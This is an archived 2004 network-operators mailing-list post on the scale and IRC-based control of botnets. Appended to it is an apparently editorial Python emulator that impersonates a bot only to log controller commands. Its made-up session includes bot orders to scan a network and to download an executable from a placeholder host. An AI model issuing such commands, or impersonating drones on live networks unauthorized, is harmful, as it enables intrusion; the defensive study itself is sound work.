North American Network Operators Group


what we do know about botnets - per your questions [was: How many backbone ...]

  • From: Gadi Evron
  • Date: Thu Dec 02 17:49:53 2004

Rich Kulawiec wrote:
> On Thu, Dec 02, 2004 at 04:18:52PM -0500, Hannigan, Martin wrote:
>
>> Can you direct me toward a singular entity of 1MM bots controlled by
>> a single master?
> Nobody can, except the single master who's in control of same, and
> whoever that is -- if there is -- is unlikely to voluntarily share
> that information publicly.
Back in 1997, a luser showed up on IRC in one of the help channels that formed to help users get rid of Trojan horses (after the big return in '96; not that Trojan horses ever really went away). The guy was a spammer. He owned nekkidchicks dot something.

He studied the works, and disappeared 6 months later. This is a losing battle, a tsunami we are now trying to stop with stones and sticks.

Actually, these kids share them like candy, as a friend of mine likes to say. I doubt there is just one singular master. It's the macro level we see, why not take the macro level into account?

> That's part of the problem: we know that there are huge numbers of
> them.  How huge?  10e7 was probably a good estimate early in 2004,
> 10e8 is starting to look plausible given reported discovery rates.
> And the quasi-related problem of spyware/adware is exacerbating it:
> it's not like that cruft is exactly fastidious about making sure that
> it doesn't open the door to things worse than itself.
In most networks, I see about 50% of the traffic being spyware/malware related... and that's in good cases. But then again, these are only my observations.

> We don't know how many there are.
Does it matter? I believe we can call it an epidemic and move on.

> We probably can't know how many there are -- unless they do something
> to make themselves noticed, and surely those controlling them are smart
> enough to realize this and keep plenty in reserve.  We can only know how
> many have made themselves visible, and even knowing that's hard.
I can tell you that 50-90% of the occupants of the different IRC networks are drones. The 5 big IRC networks have between 20K and 150K lusers at any given time. You add the numbers.

> We don't know who's controlling them: are we up against 10 people or 10,000?
Much like with any social structure, it is difficult to say.

Is someone a hacker, a cracker or a kiddie? They still do what they do, regardless of who they are and what their capabilities are.

Kids trade them like candy, spammers use them to spam. Organized crime does what organized crime does. People who want to be anonymous stay anonymous. Gangs get protection money (absurd on the net: if you pay in real life you at least know you won't be attacked, and if you were attacked by someone else, the gang you paid would protect you. That doesn't work online).

Then there are those who just like to feel like God. Go figure.

> We don't know everything they're doing with them.
It doesn't matter. They are there. They can do whatever they want with them. It is an epidemic and it has been growing for years.

> We don't know everything they're going to try to do with them.
See above. Irrelevant.

> We don't know where they'll be next: they may move around (thanks to DHCP
> and similar), may show up in multiple places (thanks to VPNs) or they
> may *really* move around (laptops).

> We don't know how many are "server" systems as opposed to end-user systems.
Depends on the malware discussed. I can give you many examples.

Sometimes there are several types used by one controller/runner, whose entire wish is to (a) recruit new drones, (b) use them to spam/network-scan to recruit new drones, (c) use these to spam for money and (d) have backup.

I have seen similar set-ups on Yahoo! chat and on IM. It is not limited to one medium.

On Yahoo! (which basically does nothing about abuse) you can recruit, or more like.. draft.. a 10K net in a couple of days.

> We don't know how to keep more from being created.
People are stupid. I don't have a solution. Maybe not allow this s**t to go through our networks? It is becoming a hazard to their operation.

> We don't have a mechanism for un-zombie'ing the ones that already exist
> (other than laboriously going after them one at a time).
We used to de-zombie them. You can try and "make like a zombie" and see what a controller/runner does, or reverse engineer a sample and see what the passwd and commands are. You can send it out in an IRC channel or remotely connect to all of them.
Some of it is legal, some of it is very shaky, legally.

None of which is a solution.

> We don't have a means to keep them from being re-zombied -- just as soon
> as the latest IE-bug-of-the-day hits Bugtraq.
Or one from last year... makes no difference. And they do get re-zombied. Users are stupid. And I used to think NOBODY is really stupid... I was wrong. Stupid in this case may mean "needs to earn a driving license for a computer as he/she is clueless".

> We don't have a viable way of controlling their actions other than
> disconnecting them entirely: sure, blocking outbound port 25 connections
> stops them from attempting spam delivery directly into mail servers, but
> surely nobody is so naive as to think those controlling these botnets
> are going to shrug their shoulders and give up when that happens?
> There are all kinds of other things they could be doing.  *Are doing*.
Amen.

> We don't have a clear understanding of how they're being controlled:
> are they quasi-autonomous?  centrally directed?  via a tree structure?
> do they "phone home"?  are they operating p2p?  all of the above?
All of the above, P2P is not really viable currently though. Nobody solved the problem of exposure when trying to control the network. IRC has its flaws... but it works out great for them now.

> And so on.
>
> But we darn well should find out.
Feel free to email me. This is all I'll say here.

	Gadi.
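Editor's added example (not part of Gadi's or Rich's posts, and not code from any bot mentioned in the thread): the "make like a zombie" step described above, as a passive IRC drone emulator. It speaks just enough RFC 1459 to register, answer PINGs, join the channel and record whatever the controller pushes at it, and it deliberately acts on nothing. The nick, channel, channel key, server name and the ".login"/".scan"/".update" strings are all constructed for the demonstration; a real run would substitute the values recovered from a reverse-engineered sample, and the session below is fed from a list of made-up lines, so nothing here touches the network.

```python
"""Passive IRC drone emulation: register, stay connected, record commands, never execute."""
import re

# RFC 1459 message grammar: [':' prefix SPACE] command {SPACE middle} [SPACE ':' trailing]
_IRC_LINE = re.compile(
    r'^(?::(?P<prefix>\S+)\s+)?'        # optional :nick!user@host or :server.name
    r'(?P<command>[A-Za-z]+|\d{3})'     # verb (PING, PRIVMSG) or 3-digit numeric reply
    r'(?P<middle>(?:\s+[^:\s]\S*)*)'    # middle params, none may start with ':'
    r'(?:\s+:(?P<trailing>.*))?\s*$'    # trailing param, may contain spaces
)


def parse_irc(line):
    """Parse one raw line into (prefix, COMMAND, params); None if it is not a valid message."""
    m = _IRC_LINE.match(line.rstrip('\r\n'))
    if not m:
        return None
    params = m.group('middle').split()
    if m.group('trailing') is not None:
        params.append(m.group('trailing'))
    return m.group('prefix'), m.group('command').upper(), params


class FakeDrone:
    """A do-nothing drone. It completes registration, joins the C&C channel, answers
    PINGs so the server keeps it around, and logs PRIVMSG/TOPIC traffic aimed at it.
    There is intentionally no code path that carries out a controller command."""

    def __init__(self, nick, channel, channel_key=None):
        self.nick = nick
        self.channel = channel
        self.channel_key = channel_key   # channel password as recovered from a sample (assumed)
        self.observed = []               # (who, kind, text) for every command seen
        self.joined = False

    def handshake(self):
        # First lines a drone sends; the USER fields here are placeholders, not a real bot's.
        return [f'NICK {self.nick}', f'USER {self.nick} 0 * :{self.nick}']

    def handle(self, line):
        """Return the list of lines to send back in response to one inbound server line."""
        parsed = parse_irc(line)
        if parsed is None:
            return []
        prefix, command, params = parsed
        out = []
        if command == 'PING':                    # keep the connection alive
            token = params[-1] if params else ''
            out.append(f'PONG :{token}')
        elif command == '001':                   # RPL_WELCOME: registered, go to the channel
            join = f'JOIN {self.channel}'
            if self.channel_key:
                join += f' {self.channel_key}'
            out.append(join)
        elif command == '433':                   # ERR_NICKNAMEINUSE: retry with a variant
            self.nick += '_'
            out.append(f'NICK {self.nick}')
        elif command == 'JOIN' and prefix and prefix.split('!')[0] == self.nick:
            self.joined = True                   # the server echoed our own JOIN
        elif command in ('332', 'TOPIC') and params:
            # The channel topic is one place standing orders get parked; record it.
            self.observed.append((prefix, 'TOPIC', params[-1]))
        elif command == 'PRIVMSG' and len(params) >= 2:
            if params[0] in (self.channel, self.nick):
                self.observed.append((prefix, 'PRIVMSG', params[-1]))
        return out


# Constructed session transcript (not captured traffic): what a controller's server might send.
SAMPLE_SESSION = [
    ':irc.example.net NOTICE AUTH :*** Looking up your hostname...',
    'PING :1101977393',
    ':irc.example.net 001 drone1234 :Welcome to the network drone1234!u@h',
    ':drone1234!u@h JOIN :#ctl',
    ':irc.example.net 332 drone1234 #ctl :.scan 10.0.0.0/8 445',
    ':ctl!op@anon.example PRIVMSG #ctl :.login hunter2',
    ':ctl!op@anon.example PRIVMSG #ctl :.update http://example.invalid/b.exe',
    ':other!x@y PRIVMSG #elsewhere :not our channel, ignored',
    'PING :keepalive',
]


def run_session(lines, nick='drone1234', channel='#ctl', key='s3kr1t'):
    """Replay a list of server lines through a FakeDrone; return (drone, lines_we_sent)."""
    drone = FakeDrone(nick, channel, key)
    sent = list(drone.handshake())
    for line in lines:
        sent.extend(drone.handle(line))
    return drone, sent


if __name__ == '__main__':
    d, sent = run_session(SAMPLE_SESSION)
    for who, kind, text in d.observed:
        print(f'{kind:8} from {who}: {text}')
    print('we sent:', sent)
```

Wiring this to a socket is a two-line change, but as the post says, only part of this activity is clearly legal; running it against a live controller is something to do with authorization, not as a hobby. The point of the emulator is observation: the password, update URLs and scan targets it records are the raw material for takedown requests and for telling a drone from a real user on the IRC networks mentioned above.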